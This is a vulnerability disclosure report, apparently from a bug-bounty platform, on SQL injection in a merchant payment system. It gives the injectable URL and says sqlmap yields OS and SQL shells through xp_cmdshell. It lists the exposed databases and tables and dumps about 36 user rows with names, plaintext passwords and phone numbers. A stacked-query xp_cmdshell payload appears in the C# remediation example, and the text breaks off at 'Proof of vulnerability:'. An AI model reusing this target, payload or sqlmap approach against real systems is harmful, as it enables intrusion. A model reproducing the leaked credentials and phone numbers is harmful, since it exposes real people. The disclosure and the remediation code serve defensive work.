SQL injection in the Lianhui Tongbao system (exposing roughly 4000 merchants' business licenses, ID cards, bank cards, verification codes and other data)
Detailed description:
The vendor is Lianhui Tongbao.
Injection point (GET parameter id):
http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos
Back-end DBMS: Microsoft SQL Server 2008
Available databases [10]:
[*] Channel
[*] Distribution
[*] Dy_cd_lhtb
[*] lhtmposmerchant
[*] master
[*] model
[*] msdb
[*] Railroad
[*] tempdb
[*] Trainsms
OS shell: obtainable (sqlmap --os-shell, i.e. command execution on the database host through xp_cmdshell)
SQL shell: obtainable (sqlmap --sql-shell)
Note that the sqlmapoutput table in the list below is the output table sqlmap creates when it runs OS commands through xp_cmdshell, so command execution was actually exercised and left a trace in the target database.
Existing tables:
Database: lhtmposmerchant [79 tables]
[*] db_area
[*] db_billorder_record
[*] db_bulletin
[*] db_channel_applyUsheild
[*] db_channel_dayprofit
[*] db_channel_product_costconfig
[*] db_channel_product_type
[*] db_channel_profitstatistics
[*] db_channel_rechargelog
[*] db_city
[*] db_credit_usedquota
[*] db_lhb_user
[*] db_lhbblackgold_jsrecord
[*] db_lhbblackgold_profit
[*] db_lhbdebit_credit_order
[*] db_lhbgold_profit
[*] db_lhbjhc_jsrecord
[*] db_lhbjhc_profit
[*] db_lhbjhf_jsrecord
[*] db_lhbjhf_profit
[*] db_lhbjhn_jsrecord
[*] db_lhbjhn_profit
[*] db_lhbjht_jsrecord
[*] db_lhbjht_profit
[*] db_lhbjhy_jsrecord
[*] db_lhbjhy_profit
[*] db_lhbptgold_jsrecord
[*] db_lhbptgold_profit
[*] db_lhbrate_config
[*] db_lhbsilver_profit
[*] db_lhbvipos_order
[*] db_lhbwhitegold_profit
[*] db_lhbyz_channelrate
[*] db_lhbyzrate_config
[*] db_lhmall_order_product
[*] db_lhmall_order_product
[*] db_lhplaneTicket_order
[*] db_lhtmpos_billlog
[*] db_lhtmpos_billorder
[*] db_lhtmpos_order
[*] db_lhtmpos_txnorder
[*] db_lhtrainTicket_order
[*] db_lhtrate_config
[*] db_lhtvipos_order
[*] db_lhtvipos_rates
[*] db_liquidationbankcode
[*] db_log
[*] db_member
[*] db_menu
[*] db_merchant_config
[*] db_mpos_channelassign
[*] db_mpos_channelassign
[*] db_mpos_channelrate
[*] db_mpos_lhbrate
[*] db_mpos_merchant
[*] db_mpos_terminal
[*] db_newlhb_user
[*] db_noqrhmobile
[*] db_pay_product_log
[*] db_power
[*] db_product_apply
[*] db_product_buyrecords
[*] db_product_class
[*] db_product_data
[*] db_product_salecost_config
[*] db_product_salecost_config
[*] db_product_saleman
[*] db_province
[*] db_role
[*] db_sellagency
[*] db_sms_send
[*] db_sms_wait
[*] db_subdistributor
[*] db_tempmobile
[*] db_terminal_user
[*] db_user
[*] db_vipuser_rate
[*] db_youze_profitstatistics
[*] sqlmapoutput
Some users:
SELECT * FROM db_user [36 rows]:
[*] 01 2 2014, 448, 1, VIPOS-tao Shanzhong, 176335, 9, 3, 0, 0, 13032191313
[*] 01 2 2014, 449, 1, VIPOS-Wang xiaohe, wxh800918, 9, 3, 0, 0, 15312155678
[*] 01 2 2014, 450, 1, VIPOS-Xu Yuhong, 218321, 9, 3, 0, 0, 13962412277
[*] 01 2 2014, 451, 1, VIPOS-Chen Fang, 206323, 9, 3, 0, 0, 18962636627
[*] 01 2 2014, 452, 1, VIPOS-ji Hai, 192179, 9, 3, 0, 0, 15618389748
[*] 01 2 2014 PM, 453, 1, VIPOS-hu guohong, 242510, 9, 3, 0, 0, 15901994055
[*] 01 2 2014 PM, 454, 1, VIPOS-Jiang Hai, 103619, 9, 3, 0, 0, 18914950187
[*] 01 2 2014 AM, 447, 1, VIPOS-olingchi, 250546, 9, 3, 0, 0, 13611933901
[*] 01 3 2014 PM, 456, 1, VIPOS-Wang Cheng Jun, 043210, 9, 3, 0, 0, 13882177061
[*] 01 3 2014, 457, 1, VIPOS-wu huihong, 096026, 9, 3, 0, 0, 15800359836
[*] 01 3 2014 AM, 455, 1, VIPOS-pure, 017533, 9, 3, 0, 0, 13732671518
[*] 01 6 2014 PM, 461, 1, VIPOS-gan Lin, 220042, 9, 3, 0, 0, 13939945338
[*] 01 6 2014 PM, 462, 1, VIPOS-huge river, 249180, 9, 3, 0, 0, 13375151875
[*] 01 6 2014 PM, 463, 1, VIPOS- Li, 8888, 8, 2, 1, 0, peixueli
[*] 01 6 2014 PM, 464, 1, VIPOS-example, 01724X, 9, 3, 0, 0, 13983211607
[*] 01 6 2014, 465, 1, VIPOS-yang Zuli, 160885, 9, 3, 0, 0, 13698886899
[*] 01 6 2014 PM, 468, 1, VIPOS-ding yuju, 075827, 9, 3, 0, 0, 13906282112
[*] 01 6 2014 AM, 459, 1, VIPOS-sun Peipei, 030489, 9, 3, 0, 0, 18616122858
[*] 01 6 2014 AM, 458, 10, Wang xiabai-finance, 123, 5, 1, 0, 0, wangxiabai
[*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2015 AM, 1392, 1, VIPOS-RHXT Liu Lin, 115411, 9, 3, 0, 0, 13458678768
[*] 01 7 2014 PM, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 PM, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 PM, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014, 472, 1, VIPOS-Tang qiuer, 8888, 8, 2, 1, 0, tangqiuer
[*] 01 7 2014 AM, 115, 1, VIPOS-Li wenjuan, 8888, 8, 2, 1, 0, liwenjuan
[*] 01 7 2014 PM, 469, 1, VIPOS-Wang xiaohe, 8888, 8, 2, 1, 0, wangxiaohe
[*] 01 7 2015 PM, 1397, 1, VIPOS-RHXT Lou Xiaoqian, 115411, 9, 3, 0, 0, 15881576086
[*] 01 7 2015 PM, 1398, 1, VIPOS-Dong Fan, 115411, 9, 3, 0, 0, 15928406481
[*] 01 7 2015 AM, 1395, 1, VIPOS-feng peak, 264911, 9, 3, 0, 0, 13541222112
[*] 01 7 2015 AM, 1396, 1, VIPOS-Liu Changjian, 264911, 9, 3, 0, 0, 13540490546
[*] 01 8 2014 AM, 474, 1, VIPOS-lu Wenjun, socl8899, 9, 3, 0, 0, 13918788846
[*] 01 8 2014 AM, 475, 1, VIPOS-Zhang jinfeng, 015042, 9, 3, 0, 0, 13918190877
[*] 01 8 2014 AM, 477, 1, VIPOS-Wang lingfeng, 118913, 8, 2, 1, 0, wlf
Most of the passwords are trivial and are stored in plaintext (the dump shows the literal values), and the administrator account (row 458, Wang xiabai-finance) uses the weak password 123.
From the back-end console, verification codes and SMS messages can be sent, and the verification codes themselves can be read (the database also holds the db_sms_send and db_sms_wait tables listed above).
Other users' passwords can be viewed.
User information is leaked.
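The injection above follows the classic ASP.NET pattern of concatenating a query-string value into SQL text. The following is an added remediation example, not the vendor's code: a code-behind handler in the style of noticeContent.aspx?action=view&id=13, once in the vulnerable form and once parameterised. The table db_bulletin exists in the listing above, but its columns (id, title, content) and the connection-string name "mpos" are assumptions for illustration.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

// Added example (not the vendor's code). Column names and the connection
// string name "mpos" are assumed for illustration.
public partial class NoticeContent : Page
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["mpos"].ConnectionString;

    // VULNERABLE: the raw id value becomes part of the SQL text. Because SQL
    // Server accepts stacked queries, id=13;EXEC xp_cmdshell 'whoami'-- runs a
    // second statement, which is how an OS shell is reached from this one parameter.
    protected void LoadNoticeVulnerable(string id)
    {
        string sql = "SELECT title, content FROM db_bulletin WHERE id = " + id;
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (r.Read()) WriteNotice(r.GetString(0), r.GetString(1));
            }
        }
    }

    // FIXED: validate the type first, then bind a typed parameter. The value is
    // sent to the server as data and can never be parsed as SQL.
    protected void LoadNoticeSafe(string rawId)
    {
        int id;
        if (!int.TryParse(rawId, out id) || id <= 0)
        {
            Response.StatusCode = 400;   // reject anything that is not a positive integer
            return;
        }

        const string sql = "SELECT title, content FROM db_bulletin WHERE id = @id";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (r.Read()) WriteNotice(r.GetString(0), r.GetString(1));
            }
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        if (Request.QueryString["action"] == "view")
        {
            LoadNoticeSafe(Request.QueryString["id"]);
        }
    }

    // HTML-encode stored content so a notice body cannot inject script into the admin page.
    private void WriteNotice(string title, string body)
    {
        Response.Write("<h1>" + HttpUtility.HtmlEncode(title) + "</h1>");
        Response.Write("<div>" + HttpUtility.HtmlEncode(body) + "</div>");
    }
}
```

Parameterisation closes the injection itself, but the working OS shell also shows that the application's database login had enough privilege to reach xp_cmdshell (sysadmin, or a configured proxy account) and that xp_cmdshell was enabled. That login should be confined to the lhtmposmerchant database with no server-level roles, and `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;` should be run unless something legitimately depends on it. The passwords in db_user should likewise be stored as salted hashes rather than the literal values the dump shows.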
Proof of vulnerability: